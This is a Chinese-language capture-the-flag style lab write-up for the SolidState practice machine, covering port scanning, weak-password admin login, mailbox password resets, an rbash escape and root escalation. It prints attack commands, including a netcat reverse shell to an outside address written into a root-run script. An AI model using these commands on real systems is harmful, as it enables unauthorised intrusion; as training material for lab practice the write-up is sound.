打靶练习1-SolidState

admin 2024年1月19日12:55:14评论10 views字数 979阅读3分15秒阅读模式

 容器逃逸

01

容器逃逸

拿到靶机IP后,直接扫描端口

nmap -p- 172.16.33.35nmap -sV -A -p 22,25,80,119,4555 172316.33.35

打靶练习1-SolidState

扫了一下目录,没有啥收获,访问4555端口的时候,发现可以用telnet连接,用弱密码root/root进去:

telnet 172.16.33.35 4555

打靶练习1-SolidState

查看一下所有用户:

打靶练习1-SolidState

由于不知道邮箱密码,但是我看可以通过ROOT用户修改账户密码,只能是一个一个去试试,最后找到mindy这个用户里面有SSH的密码:

打靶练习1-SolidState

打靶练习1-SolidState

SSH登录,发现第一个key:

打靶练习1-SolidState

进来之后,发现shell是rbash,限制很多,看大佬笔记,发现可以rbash逃逸,链接如下:

https://xz.aliyun.com/t/7642采用大佬给的payload:ssh username@IP  "export TERM=xterm;python -c  'import pty;pty.spawn("/bin/bash")'ssh [email protected] "export TERM=xterm;python -c 'import pty;pty.spawn("/bin/bash")'"

打靶练习1-SolidState

成功逃逸后,查看一下PS进程,发现james有run.sh的文件,进入/opt看看:

打靶练习1-SolidState

发现tmp.py文件有ROOT权限,而且我们也可以写入它,直接写入反弹shell脚本:

echo 'import os; os.system("/bin/nc 10.8.0.x 6666 -e /bin/bash")' > /opt/tmp.py

打靶练习1-SolidState

反弹成功:

打靶练习1-SolidState

02

总结

    这个靶机突破点不难,倒是容器逃逸这里又学到了新姿势,很适合练手。

看到了,点个赞转发一下啦,如果对网络安全技术感兴趣的可以后台私信我哟

免责声明:

本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。

第二十七条:任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动;不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序和工具;明知他人从事危害网络安全的活动,不得为其提供技术支持、广告推广、支付结算等帮助

原文始发于微信公众号(重生者安全团队):打靶练习1-SolidState

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月19日12:55:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶练习1-SolidStatehttp://cn-sec.com/archives/2408634.html

发表评论

匿名网友 填写信息